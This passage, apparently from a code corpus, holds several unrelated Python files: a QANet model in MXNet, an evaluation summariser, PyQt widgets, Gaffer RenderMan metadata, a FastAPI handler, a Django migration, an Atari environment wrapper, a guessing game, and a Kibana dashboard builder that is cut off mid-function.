query_concat = F.concat(query_word_emb, query_char_emb, dim=-1)
# highway net
context_final_emb = self.highway(context_concat)
query_final_emb = self.highway(query_concat)
# embedding encoder
# share the weights between passage and question
context_emb_encoded = self.emb_encoder(context_final_emb, context_mask)
query_emb_encoded = self.emb_encoder(query_final_emb, query_mask)
# context-query attention layer
M = self.co_attention(context_emb_encoded, query_emb_encoded, context_mask,
query_mask, context_max_len, query_max_len)
M = self.project(M)
M = self.dropout(M)
# model encoder layer
M_0 = self.model_encoder(M, context_mask)
M_1 = self.model_encoder(M_0, context_mask)
M_2 = self.model_encoder(M_1, context_mask)
# predict layer
begin_hat = self.flatten(
self.predict_begin(F.concat(M_0, M_1, dim=-1)))
end_hat = self.flatten(self.predict_end(F.concat(M_0, M_2, dim=-1)))
predicted_begin = mask_logits(begin_hat, context_mask)
predicted_end = mask_logits(end_hat, context_mask)
return predicted_begin, predicted_end, y_begin, y_end
class Encoder(gluon.HybridBlock):
r"""
Stacked block of Embedding encoder or Model encoder.
"""
def __init__(self, kernel_size, num_filters, conv_layers=2, num_heads=8,
num_blocks=1, **kwargs):
super(Encoder, self).__init__(**kwargs)
self.dropout = gluon.nn.Dropout(opt.layers_dropout)
total_layers = float((conv_layers + 2) * num_blocks)
sub_layer_idx = 1
self.num_blocks = num_blocks
self.stack_encoders = gluon.nn.HybridSequential()
with self.stack_encoders.name_scope():
for _ in range(num_blocks):
self.stack_encoders.add(
OneEncoderBlock(
kernel_size=kernel_size,
num_filters=num_filters,
conv_layers=conv_layers,
num_heads=num_heads,
total_layers=total_layers,
sub_layer_idx=sub_layer_idx
)
)
sub_layer_idx += (conv_layers + 2)
def hybrid_forward(self, F, x, mask):
r"""Implement forward computation.
Parameters
-----------
x : NDArray
input tensor with shape `(batch_size, sequence_length, features)`
mask : NDArray
input tensor with shape `(batch_size, sequence_length)`
Returns, NDArray
--------
output tensor with shape `(batch_size, sequence_length, features)`
"""
for encoder in self.stack_encoders:
x = encoder(x, mask)
x = F.Dropout(x, p=opt.layers_dropout)
return x
class OneEncoderBlock(gluon.HybridBlock):
r"""The basic encoder block.
Parameters
----------
kernel_size : int
The kernel size for all depthwise convolution layers.
num_filters : int
The number of filters for all convolution layers.
conv_layers : int
The number of convolution layers in one encoder block.
num_heads : int
The number of heads in multi-head attention layer.
total_layers : int
sub_layer_idx : int
The sub_layer_idx / total_layers is the dropout probability for layer.
"""
def __init__(self, kernel_size, num_filters, conv_layers, num_heads, total_layers,
sub_layer_idx, **kwargs):
super(OneEncoderBlock, self).__init__(**kwargs)
self.position_encoder = PositionEncoder()
self.convs = gluon.nn.HybridSequential()
with self.convs.name_scope():
for _ in range(conv_layers):
one_conv_module = gluon.nn.HybridSequential()
with one_conv_module.name_scope():
one_conv_module.add(
gluon.nn.LayerNorm(epsilon=1e-06)
)
one_conv_module.add(
gluon.nn.Dropout(opt.layers_dropout)
)
one_conv_module.add(
DepthwiseConv(
kernel_size=kernel_size,
num_filters=num_filters,
input_channels=num_filters
)
)
one_conv_module.add(
StochasticDropoutLayer(
dropout=(sub_layer_idx / total_layers) *
(1 - opt.p_l)
)
)
sub_layer_idx += 1
self.convs.add(one_conv_module)
with self.name_scope():
self.dropout = gluon.nn.Dropout(opt.layers_dropout)
self.attention = SelfAttention(num_heads=num_heads)
self.attention_dropout = StochasticDropoutLayer(
(sub_layer_idx / total_layers) * (1 - opt.p_l))
sub_layer_idx += 1
self.attention_layer_norm = gluon.nn.LayerNorm(epsilon=1e-06)
self.positionwise_ffn = gluon.nn.HybridSequential()
with self.positionwise_ffn.name_scope():
self.positionwise_ffn.add(
gluon.nn.LayerNorm(epsilon=1e-06)
)
self.positionwise_ffn.add(
gluon.nn.Dropout(rate=opt.layers_dropout)
)
self.positionwise_ffn.add(
gluon.nn.Dense(
units=opt.emb_encoder_conv_channels,
activation='relu',
use_bias=True,
weight_initializer=MSRAPrelu(),
flatten=False
)
)
self.positionwise_ffn.add(
gluon.nn.Dense(
units=opt.emb_encoder_conv_channels,
use_bias=True,
weight_initializer=Xavier(),
flatten=False
)
)
self.positionwise_ffn.add(
StochasticDropoutLayer(
dropout=(sub_layer_idx / total_layers) * (1 - opt.p_l)
)
)
def hybrid_forward(self, F, x, mask):
r"""Implement forward computation.
Parameters
-----------
x : NDArray
input tensor with shape `(batch_size, sequence_length, hidden_size)`
mask : NDArray
input tensor with shape `(batch_size, sequence_length)`
Returns
--------
x : NDArray
output tensor with shape `(batch_size, sequence_length, hidden_size)`
mask : NDArray
output tensor with shape `(batch_size, sequence_length)`
"""
x = self.position_encoder(x)
for conv in self.convs:
residual = x
x = conv(x) + residual
residual = x
x = self.attention_layer_norm(x)
x = F.Dropout(x, p=opt.layers_dropout)
x = self.attention(x, mask)
x = self.attention_dropout(x) + residual
return x + self.positionwise_ffn(x)
class StochasticDropoutLayer(gluon.HybridBlock):
r"""
Stochastic dropout a layer.
"""
def __init__(self, dropout, **kwargs):
super(StochasticDropoutLayer, self).__init__(**kwargs)
self.dropout = dropout
with self.name_scope():
self.dropout_fn = gluon.nn.Dropout(dropout)
def hybrid_forward(self, F, inputs):
if F.random.uniform().asscalar() < self.dropout:
return F.zeros(shape=(1,))
else:
return self.dropout_fn(inputs)
class SelfAttention(gluon.HybridBlock):
r"""
Implementation of self-attention with gluonnlp.model.MultiHeadAttentionCell
"""
def __init__(self, num_heads, **kwargs):
super(SelfAttention, self).__init__(**kwargs)
with self.name_scope():
self.attention = MultiHeadAttentionCell(
num_heads=num_heads,
base_cell=DotProductAttentionCell(
scaled=True,
dropout=opt.layers_dropout,
use_bias=False
),
query_units=opt.emb_encoder_conv_channels,
key_units=opt.emb_encoder_conv_channels,
value_units=opt.emb_encoder_conv_channels,
use_bias=False,
weight_initializer=Xavier()
)
def hybrid_forward(self, F, x, mask):
r"""Implement forward computation.
Parameters
-----------
x : NDArray
input tensor with shape `(batch_size, sequence_length, hidden_size)`
mask : NDArray
input tensor with shape `(batch_size, sequence_length)`
Returns
--------
x : NDArray
output tensor with shape `(batch_size, sequence_length, hidden_size)`
"""
mask = F.batch_dot(mask.expand_dims(axis=2), mask.expand_dims(axis=1))
return self.attention(x, x, mask=mask)[0]
class PositionEncoder(gluon.HybridBlock):
r"""
An implementation of position encoder.
"""
def __init__(self, **kwargs):
super(PositionEncoder, self).__init__(**kwargs)
with self.name_scope():
pass
def hybrid_forward(self, F, x, min_timescale=1.0, max_timescale=1e4):
r"""Implement forward computation.
Parameters
-----------
x : NDArray
input tensor with shape `(batch_size, sequence_length, hidden_size)`
Returns
--------
: NDArray
output tensor with shape `(batch_size, sequence_length, hidden_size)`
"""
length = x.shape[1]
channels = x.shape[2]
position = nd.array(range(length))
num_timescales = channels // 2
log_timescale_increment = (
math.log(float(max_timescale) / float(min_timescale)) / (num_timescales - 1))
inv_timescales = min_timescale * \
nd.exp(nd.array(range(num_timescales)) * -log_timescale_increment)
scaled_time = F.expand_dims(
position, 1) * F.expand_dims(inv_timescales, 0)
signal = F.concat(F.sin(scaled_time), F.cos(scaled_time), dim=1)
signal = F.reshape(signal, shape=(1, length, channels))
return x + signal.as_in_context(x.context)
class DepthwiseConv(gluon.HybridBlock):
r"""
An implementation of depthwise-convolution net.
"""
def __init__(self, kernel_size, num_filters, input_channels, **kwargs):
super(DepthwiseConv, self).__init__(**kwargs)
with self.name_scope():
self.depthwise_conv = gluon.nn.Conv1D(
channels=input_channels,
kernel_size=kernel_size,
padding=kernel_size // 2,
groups=input_channels,
use_bias=False,
weight_initializer=MSRAPrelu()
)
self.pointwise_conv = gluon.nn.Conv1D(
channels=num_filters,
kernel_size=1,
activation='relu',
use_bias=True,
weight_initializer=MSRAPrelu(),
bias_initializer='zeros'
)
def hybrid_forward(self, F, inputs):
r"""Implement forward computation.
Parameters
-----------
inputs : NDArray
input tensor with shape `(batch_size, sequence_length, hidden_size)`
Returns
--------
x : NDArray
output tensor with shape `(batch_size, sequence_length, new_hidden_size)`
"""
tmp = F.transpose(inputs, axes=(0, 2, 1))
depthwise_conv = self.depthwise_conv(tmp)
outputs = self.pointwise_conv(depthwise_conv)
return F.transpose(outputs, axes=(0, 2, 1))
class CoAttention(gluon.HybridBlock):
r"""
An implementation of co-attention block.
"""
def __init__(self, **kwargs):
super(CoAttention, self).__init__(**kwargs)
with self.name_scope():
self.w4c = gluon.nn.Dense(
units=1,
flatten=False,
weight_initializer=Xavier(),
use_bias=False
)
self.w4q = gluon.nn.Dense(
units=1,
flatten=False,
weight_initializer=Xavier(),
use_bias=False
)
self.w4mlu = self.params.get(
'linear_kernel', shape=(1, 1, opt.emb_encoder_conv_channels), init=mx.init.Xavier())
self.bias = self.params.get(
'coattention_bias', shape=(1,), init=mx.init.Zero())
def hybrid_forward(self, F, context, query, context_mask, query_mask,
context_max_len, query_max_len, w4mlu, bias):
"""Implement forward computation.
Parameters
-----------
context : NDArray
input tensor with shape `(batch_size, context_sequence_length, hidden_size)`
query : NDArray
input tensor with shape `(batch_size, query_sequence_length, hidden_size)`
context_mask : NDArray
input tensor with shape `(batch_size, context_sequence_length)`
query_mask : NDArray
input tensor with shape `(batch_size, query_sequence_length)`
context_max_len : int
query_max_len : int
Returns
--------
return : NDArray
output tensor with shape `(batch_size, context_sequence_length, 4*hidden_size)`
"""
context_mask = F.expand_dims(context_mask, axis=-1)
query_mask = F.expand_dims(query_mask, axis=1)
similarity = self._calculate_trilinear_similarity(
context, query, context_max_len, query_max_len, w4mlu, bias)
similarity_dash = F.softmax(mask_logits(similarity, query_mask))
similarity_dash_trans = F.transpose(F.softmax(
mask_logits(similarity, context_mask), axis=1), axes=(0, 2, 1))
c2q = F.batch_dot(similarity_dash, query)
q2c = F.batch_dot(F.batch_dot(
similarity_dash, similarity_dash_trans), context)
return F.concat(context, c2q, context * c2q, context * q2c, dim=-1)
def _calculate_trilinear_similarity(self, context, query, context_max_len, query_max_len,
w4mlu, bias):
"""Implement the computation of trilinear similarity function.
refer https://github.com/NLPLearn/QANet/blob/master/layers.py#L505
The similarity function is:
f(w, q) = W[w, q, w * q]
where w and q represent the word in context and query respectively,
and * operator means hadamard product.
Parameters
-----------
context : NDArray
input tensor with shape `(batch_size, context_sequence_length, hidden_size)`
query : NDArray
input tensor with shape `(batch_size, query_sequence_length, hidden_size)`
context_max_len : int
context_max_len : int
Returns
--------
similarity_mat : NDArray
output tensor with shape `(batch_size, context_sequence_length, query_sequence_length)`
"""
subres0 = nd.tile(self.w4c(context), [1, 1, query_max_len])
subres1 = nd.tile(nd.transpose(
self.w4q(query), axes=(0, 2, 1)), [1, context_max_len, 1])
subres2 = nd.batch_dot(w4mlu * context,
nd.transpose(query, axes=(0, 2, 1)))
similarity_mat = subres0 + subres1 + subres2 + bias
return similarity_mat
|
python
|
import re, sys, glob
from os.path import join
from tabulate import tabulate
indir = sys.argv[1]
outfile = join(indir, "xfold_eval.txt")
name2fold = {}
for fold in range(5):
if fold not in name2fold:
name2fold[fold] = {}
file = join(indir, f"fold{fold}/eval.txt")
with open(file, 'r') as f:
tuple_performance, _, instance_performance = f.read().strip().split("Tuple Level")[1].strip().split("\n")
score = tuple_performance.split(",") + instance_performance.split(",")
for i, s in enumerate(score):
s = float(s.split(":")[1].strip())
score[i] = s
tupp, tupr, tupf, insp, insr, insf = score
name2fold[fold] = {
"tupp": tupp,
"tupr": tupr,
"tupf": tupf,
"insp": insp,
"insr": insr,
"insf": insf
}
def avg(l):
return sum(l)/len(l)
tupp = [name2fold[fold]['tupp'] for fold in range(5)]
tupr = [name2fold[fold]['tupr'] for fold in range(5)]
tupf = [name2fold[fold]['tupf'] for fold in range(5)]
insp = [name2fold[fold]['insp'] for fold in range(5)]
insr = [name2fold[fold]['insr'] for fold in range(5)]
insf = [name2fold[fold]['insf'] for fold in range(5)]
to_print = []
with open(outfile,'w') as f:
print(f"Saving to {outfile}")
to_print.append(["SCORE", "TUPLE P", "TUPLE R", "TUPLE F", "INS P", "INS R", "INS F"])
to_print.append(["AVG", avg(tupp), avg(tupr), avg(tupf), avg(insp), avg(insr), avg(insf)])
to_print.append(["---"] * 7)
to_print.extend([[f"FOLD{idx}", tp, tr, tf, ip, ir, iff] for idx, (tp, tr, tf, ip, ir, iff) in enumerate(zip(tupp, tupr, tupf, insp, insr, insf))])
f.write(tabulate(to_print))
|
python
|
# coding: utf-8
__doc__ = """包含一些继承自默认Qt控件的自定义行为控件。"""
import os
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QLineEdit, QTextEdit
class QLineEditMod(QLineEdit):
def __init__(self, accept="dir", file_filter=set()):
super().__init__()
self.setContextMenuPolicy(Qt.NoContextMenu)
self._accept = accept
self._filter = file_filter
self._drag_temp = ""
@property
def local_path(self):
return self.text().strip()
def dragEnterEvent(self, event):
if event.mimeData().hasUrls():
if self._accept == "file":
self._drag_temp = os.path.realpath(
event.mimeData().urls()[0].toLocalFile()
)
if (
not self._filter
or os.path.splitext(self._drag_temp)[1] in self._filter
):
event.accept()
else:
event.ignore()
elif self._accept == "dir":
event.accept()
else:
event.ignore()
else:
event.ignore()
def dropEvent(self, event):
if not self._drag_temp:
self._drag_temp = os.path.realpath(event.mimeData().urls()[0].toLocalFile())
if self._accept == "file" and os.path.isfile(self._drag_temp):
self.setText(self._drag_temp)
elif self._accept == "dir" and os.path.isdir(self._drag_temp):
self.setText(self._drag_temp)
class QTextEditMod(QTextEdit):
def __init__(self, accept="file", file_filter=set()):
super().__init__()
self.setLineWrapMode(QTextEdit.NoWrap)
self.setContextMenuPolicy(Qt.NoContextMenu)
self._accept = accept
self._filter = file_filter
self._drag_temp = list()
@property
def local_paths(self):
file_dir_paths = self.toPlainText().split("\n")
if self._accept == "dir":
return [path for path in file_dir_paths if os.path.isdir(path)]
if self._accept == "file":
return [path for path in file_dir_paths if os.path.isfile(path)]
return []
def _stash_from_urls(self, urls):
self._drag_temp.clear()
for file_or_dir in (path.toLocalFile() for path in urls):
file_or_dir = os.path.realpath(file_or_dir)
if os.path.isfile(file_or_dir):
self._drag_temp.append(file_or_dir)
continue
self._drag_temp.append(file_or_dir)
for root, _, files in os.walk(file_or_dir):
self._drag_temp.extend(
os.path.join(root, filename) for filename in files
)
def dragEnterEvent(self, event):
self._drag_temp.clear()
if event.mimeData().hasUrls():
if self._accept == "file":
self._stash_from_urls(event.mimeData().urls())
if not self._filter or set(
os.path.splitext(fp)[1]
for fp in self._drag_temp
if os.path.isfile(fp)
).issubset(self._filter):
event.accept()
else:
event.ignore()
elif self._accept == "dir":
event.accept()
else:
event.ignore()
if not self.toPlainText().endswith("\n"):
self.append("")
else:
event.ignore()
def dropEvent(self, event):
cur_text = self.toPlainText()
super().dropEvent(event)
if not self._drag_temp:
self._stash_from_urls(event.mimeData().urls())
if self._accept == "file":
self.setText(
cur_text
+ "\n".join(path for path in self._drag_temp if os.path.isfile(path))
)
elif self._accept == "dir":
self.setText(
cur_text
+ "\n".join(path for path in self._drag_temp if os.path.isdir(path))
)
else:
self.setText("")
self.verticalScrollBar().setValue(self.verticalScrollBar().maximumHeight())
|
python
|
"""
A collection of constants including error message
"""
ERROR_CLONE_TIMEOUT_EXPIRED = 'Timeout expired error'
ERROR_CLONE_FAILED = 'Cloning failed error'
|
python
|
##########################################################################
#
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import IECore
import Gaffer
import GafferUI
import GafferRenderMan
def __qualitySummary( plug ) :
info = []
if plug["pixelSamples"]["enabled"].getValue() :
ps = plug["pixelSamples"]["value"].getValue()
info.append( "Pixel Samples %dx%d" % ( ps[0], ps[1] ) )
return ", ".join( info )
def __hiderSummary( plug ) :
info = []
if plug["hider"]["enabled"].getValue() :
info.append( plug["hider"]["value"].getValue().capitalize() )
if plug["hiderDepthFilter"]["enabled"].getValue() :
info.append( "Depth Filter : " + plug["hiderDepthFilter"]["value"].getValue().capitalize() )
if plug["hiderJitter"]["enabled"].getValue() :
info.append( "Jitter " + ( "On" if plug["hiderJitter"]["value"].getValue() else "Off" ) )
if plug["hiderSampleMotion"]["enabled"].getValue() :
info.append( "Sample Motion " + ( "On" if plug["hiderSampleMotion"]["value"].getValue() else "Off" ) )
if plug["hiderExtremeMotionDOF"]["enabled"].getValue() :
info.append( "Extreme MDOF " + ( "On" if plug["hiderExtremeMotionDOF"]["value"].getValue() else "Off" ) )
if plug["hiderProgressive"]["enabled"].getValue() :
info.append( "Progressive " + ( "On" if plug["hiderProgressive"]["value"].getValue() else "Off" ) )
return ", ".join( info )
def __statisticsSummary( plug ) :
info = []
if plug["statisticsLevel"]["enabled"].getValue() :
info.append( "Level %d" % plug["statisticsLevel"]["value"].getValue() )
if plug["statisticsFileName"]["enabled"].getValue() :
info.append( "File name" )
if plug["statisticsProgress"]["enabled"].getValue() :
info.append( "Progress " + ( "On" if plug["statisticsProgress"]["value"].getValue() else "Off" ) )
return ", ".join( info )
def __searchPathsSummary( plug ) :
info = []
for childName, label in (
( "shaderSearchPath", "Shaders" ),
( "textureSearchPath", "Textures" ),
( "displaySearchPath", "Displays" ),
( "archiveSearchPath", "Archives" ),
( "proceduralSearchPath", "Procedurals" ),
) :
if plug[childName]["enabled"].getValue() :
info.append( label )
return ", ".join( info )
Gaffer.Metadata.registerNode(
GafferRenderMan.RenderManOptions,
"description",
"""
Sets global scene options applicable to RenderMan
renderers. Use the StandardOptions node to set
global options applicable to all renderers.
""",
plugs = {
# Summaries
"options" : [
"layout:section:Quality:summary", __qualitySummary,
"layout:section:Hider:summary", __hiderSummary,
"layout:section:Statistics:summary", __statisticsSummary,
"layout:section:Search Paths:summary", __searchPathsSummary,
],
# Quality
"options.pixelSamples" : [
"description",
"""
The number of primary samples to divide each pixel into
in the X and Y directions. For example, 3x3 gives a total of
9 samples per pixel. This is the primary quality control for
geometric antialiasing and motion blur.
""",
"layout:section", "Quality",
],
# Hider
"options.hider" : [
"description",
"""
The "Hidden" hider means the classic REYES algorithm
is used, and the "Raytrace" hider means a more modern
raytraced algorithm is used.
""",
"layout:section", "Hider",
],
"options.hider.value" : [
"preset:Hidden", "hidden",
"preset:Raytrace", "raytrace",
"plugValueWidget:type", "GafferUI.PresetsPlugValueWidget",
],
"options.hiderDepthFilter" : [
"description",
"""
The filter used to compute a single depth
value per pixel from the depths in each
pixel sample.
""",
"layout:section", "Hider",
"label", "Depth Filter",
],
"options.hiderDepthFilter.value" : [
"preset:Min", "min",
"preset:Max", "max",
"preset:Average", "average",
"preset:Midpoint", "midpoint",
"plugValueWidget:type", "GafferUI.PresetsPlugValueWidget",
],
"options.hiderJitter" : [
"description",
"""
Whether or not each pixel sample is
jittered about the centre of its subpixel
position, or if they're aligned in a
regular grid. If in doubt, leave this on.
""",
"layout:section", "Hider",
"label", "Jitter",
],
"options.hiderSampleMotion" : [
"description",
"""
May be turned off to disable the sampling of
motion blur, but keep motion vectors available
for use in shaders. This is useful for
rendering a motion vector pass to allow
2D motion blur to be applied as a post process.
If you simply wish to turn off motion blur
entirely, then use the motion blur settings
in the StandardOptions node.
""",
"layout:section", "Hider",
"label", "Sample Motion",
],
"options.hiderExtremeMotionDOF" : [
"description",
"""
An alternative sampling algorithm which
is more expensive, but gives higher quality
results when objects are both moving quickly
and are out of focus.
""",
"layout:section", "Hider",
"label", "Extreme Motion DOF",
],
"options.hiderProgressive" : [
"description",
"""
Renders at progressively increasing levels
of quality, to give quick low quality feedback
at the start of an interactive render. Only
applies when the raytrace hider is used.
""",
"layout:section", "Hider",
"label", "Progressive",
],
# Statistics
"options.statisticsLevel" : [
"description",
"""
Determines the verbosity of statistics
output.
""",
"layout:section", "Statistics",
"label", "Level",
],
"options.statisticsLevel.value" : [
"preset:0 (Off)", 0,
"preset:1", 1,
"preset:2", 2,
"preset:3 (Most Verbose)", 3,
"plugValueWidget:type", "GafferUI.PresetsPlugValueWidget",
],
"options.statisticsFileName" : [
"description",
"""
The name of a file where the statistics
will be written.
""",
"layout:section", "Statistics",
"label", "File Name",
],
"options.statisticsFileName.value" : [
"plugValueWidget:type", "GafferUI.FileSystemPathPlugValueWidget",
"pathPlugValueWidget:leaf", True,
"pathPlugValueWidget:bookmarks", "statistics",
"fileSystemPathPlugValueWidget:extensions", IECore.StringVectorData( [ "htm", "html", "txt", "stats" ] ),
],
"options.statisticsProgress" : [
"description",
"""
Turning this on causes a render progress
percentage to be printed out continuously
during rendering.
""",
"layout:section", "Statistics",
"label", "Progress",
],
# Search Paths
"options.shaderSearchPath" : [
"description",
"""
The filesystem paths where shaders are
searched for. Paths should be separated
by ':'.
""",
"layout:section", "Search Paths",
"label", "Shaders",
],
"options.textureSearchPath" : [
"description",
"""
The filesystem paths where shaders are
located. Paths should be separated
by ':'.
""",
"layout:section", "Search Paths",
"label", "Textures",
],
"options.displaySearchPath" : [
"description",
"""
The filesystem paths where display driver
plugins are located. These will be used when searching
for drivers specified using the Outputs
node. Paths should be separated by ':'.
""",
"layout:section", "Search Paths",
"label", "Displays",
],
"options.archiveSearchPath" : [
"description",
"""
The filesystem paths where RIB archives
are located. These will be used when searching
for archives specified using the ExternalProcedural
node. Paths should be separated by ':'.
""",
"layout:section", "Search Paths",
"label", "Archives",
],
"options.proceduralSearchPath" : [
"description",
"""
The filesystem paths where DSO procedurals
are located. These will be used when searching
for procedurals specified using the ExternalProcedural
node. Paths should be separated by ':'.
""",
"layout:section", "Search Paths",
"label", "Procedurals",
],
}
)
|
python
|
from fastapi import Request
from geobook.db.backends.mongodb import exceptions
from starlette.responses import JSONResponse
async def validation_exception_handler(
request: Request,
exc: exceptions.ValidationError,
) -> JSONResponse:
headers = getattr(exc, 'headers', None)
if headers:
return JSONResponse(
{'detail': f'{exc}'}, status_code=400, headers=headers
)
else:
return JSONResponse(
{'detail': f'{exc}'}, status_code=400, headers=headers
)
|
python
|
# Generated by Django 2.0.5 on 2018-06-12 17:31
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('webarchives', '0004_auto_20180609_1839'),
]
operations = [
migrations.AlterField(
model_name='importedrecord',
name='metadata',
field=django.contrib.postgres.fields.jsonb.JSONField(default={}),
),
]
|
python
|
from collections import deque
import numpy as np
from gym import spaces
from gym.envs.atari.atari_env import AtariEnv
from . import utils
class MultiFrameAtariEnv(AtariEnv):
metadata = {'render.modes': ['human', 'rgb_array']}
no_op_steps = 30
def __init__(self, game='pong', obs_type='image', buf_size=4, gray=True,
frameskip=4, repeat_action_probability=0.):
super(MultiFrameAtariEnv, self).__init__(game=game, obs_type=obs_type,
frameskip=frameskip,
repeat_action_probability=repeat_action_probability)
self._cur_st = None
self._nx_st = None
self._img_buf = deque(maxlen=buf_size)
self._gray = gray
self._shape = (84, 84)
if self._gray:
self.observation_space = spaces.Box(low=0, high=255,
shape=(self._shape[0], self._shape[1], buf_size),
dtype=np.uint8)
else:
self.observation_space = spaces.Box(low=0, high=255,
shape=(self._shape[0], self._shape[1], 3, buf_size),
dtype=np.uint8)
self._initialize()
def _initialize(self):
self._nx_st = super(MultiFrameAtariEnv, self).reset()
for _ in range(self._img_buf.maxlen):
self._img_buf.append(utils.preprocess(self._nx_st, self._shape, self._gray))
for _ in range(np.random.randint(1, self.no_op_steps) // self.frameskip):
self.step(0)
def step(self, a):
self._cur_st = self._nx_st.copy()
self._nx_st, reward, done, info = super(MultiFrameAtariEnv, self).step(a)
nx_st = np.maximum(self._nx_st, self._cur_st) if self._gray else self._nx_st
self._img_buf.append(utils.preprocess(nx_st, self._shape, self._gray))
return np.array(list(self._img_buf)), reward, done, info
def reset(self):
self._img_buf.clear()
self._initialize()
return np.array(list(self._img_buf))
from gym.envs.registration import register
for game in ['air_raid', 'alien', 'amidar', 'assault', 'asterix', 'asteroids', 'atlantis',
'bank_heist', 'battle_zone', 'beam_rider', 'berzerk', 'bowling', 'boxing', 'breakout', 'carnival',
'centipede', 'chopper_command', 'crazy_climber', 'demon_attack', 'double_dunk',
'elevator_action', 'enduro', 'fishing_derby', 'freeway', 'frostbite', 'gopher', 'gravitar',
'hero', 'ice_hockey', 'jamesbond', 'journey_escape', 'kangaroo', 'krull', 'kung_fu_master',
'montezuma_revenge', 'ms_pacman', 'name_this_game', 'phoenix', 'pitfall', 'pong', 'pooyan',
'private_eye', 'qbert', 'riverraid', 'road_runner', 'robotank', 'seaquest', 'skiing',
'solaris', 'space_invaders', 'star_gunner', 'tennis', 'time_pilot', 'tutankham', 'up_n_down',
'venture', 'video_pinball', 'wizard_of_wor', 'yars_revenge', 'zaxxon']:
name = ''.join([g.capitalize() for g in game.split('_')])
register(
id='MultiFrame{}-v0'.format(name),
entry_point='distributed_rl.libs.wrapped_env:MultiFrameAtariEnv',
kwargs={'game': game, 'obs_type': 'image'},
max_episode_steps=10000,
nondeterministic=False,
)
register(
id='SingleFrame{}-v0'.format(name),
entry_point='distributed_rl.libs.wrapped_env:MultiFrameAtariEnv',
kwargs={'game': name, 'obs_type': 'image', 'buf_size': 1, 'gray': False},
max_episode_steps=10000,
nondeterministic=False,
)
|
python
|
from random import randint
from time import sleep
computador = randint(0, 5)
print('-=' * 20)
print('Vou pensar em um número entre 0 e 5.Tente adivinhar...')
print('-=' * 20)
jogador = int(input('Em que número eu pensei? '))
print('Processando...')
sleep(3)
if jogador == computador:
print('Parabéns! Você acertou!')
else:
print(f'Eu ganhei! Eu pensei no número {computador} e não no {jogador}.')
|
python
|
try:
from pycaret.internal.pycaret_experiment import TimeSeriesExperiment
using_pycaret=True
except ImportError:
using_pycaret=False
|
python
|
#! /usr/bin/env python
import json
import argparse
from dashboard.common import elastic_access
from dashboard.common import logger_utils
from dashboard.conf import config
from dashboard.conf import testcases
from dashboard_assembler import DashboardAssembler
from visualization_assembler import VisualizationAssembler
logger = logger_utils.DashboardLogger('elastic2kibana').get
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--config-file",
dest='config_file',
help="Config file location")
args = parser.parse_args()
CONF = config.APIConfig().parse(args.config_file)
_installers = {'fuel', 'apex', 'compass', 'joid'}
class KibanaConstructor(object):
def __init__(self):
super(KibanaConstructor, self).__init__()
self.js_dict = {}
def construct(self):
for project, case_dicts in testcases.testcases_yaml.items():
for case in case_dicts:
self._construct_by_case(project, case)
return self
def _construct_by_case(self, project, case):
case_name = case.get('name')
vis_ps = case.get('visualizations')
family = case.get('test_family')
for vis_p in vis_ps:
self._construct_by_vis(project, case_name, family, vis_p)
def _construct_by_vis(self, project, case, family, vis_p):
for installer in _installers:
pods_and_scenarios = self._get_pods_and_scenarios(project,
case,
installer)
for pod, scenarios in pods_and_scenarios.iteritems():
visualizations = self._construct_visualizations(project,
case,
installer,
pod,
scenarios,
vis_p,
CONF.es_url,
CONF.es_creds)
dashboard = DashboardAssembler(project,
case,
family,
installer,
pod,
visualizations,
CONF.es_url,
CONF.es_creds)
self._set_js_dict(case,
pod,
installer,
family,
vis_p.get('name'),
dashboard.id)
@staticmethod
def _construct_visualizations(project,
case,
installer,
pod,
scenarios,
vis_p,
es_url,
es_creds):
visualizations = []
for scenario in scenarios:
visualizations.append(VisualizationAssembler(project,
case,
installer,
pod,
scenario,
vis_p,
es_url,
es_creds))
return visualizations
def _set_js_dict(self, case, pod, installer, family, metric, id):
test_label = '{} {}'.format(case, metric)
if family not in self.js_dict:
self.js_dict[family] = {}
js_test_family = self.js_dict[family]
if test_label not in js_test_family:
js_test_family[test_label] = {}
js_test_label = js_test_family[test_label]
if installer not in js_test_label:
js_test_label[installer] = {}
js_installer = js_test_label[installer]
js_installer[pod] = CONF.kibana_url + '#/dashboard/' + id
def config_js(self):
with open(CONF.js_path, 'w+') as conf_js_fdesc:
conf_js_fdesc.write('var kibana_dashboard_links = ')
conf_js_fdesc.write(str(self.js_dict).replace("u'", "'"))
def _get_pods_and_scenarios(self, project, case, installer):
query = json.JSONEncoder().encode({
"query": {
"bool": {
"must": [
{"match_all": {}}
],
"filter": [
{"match": {"installer": installer}},
{"match": {"project_name": project}},
{"match": {"case_name": case}}
]
}
}
})
elastic_data = elastic_access.get_docs(CONF.index_url,
CONF.es_creds,
query)
pods_and_scenarios = {}
for data in elastic_data:
pod = data['pod_name']
if pod in pods_and_scenarios:
pods_and_scenarios[pod].add(data['scenario'])
else:
pods_and_scenarios[pod] = {data['scenario']}
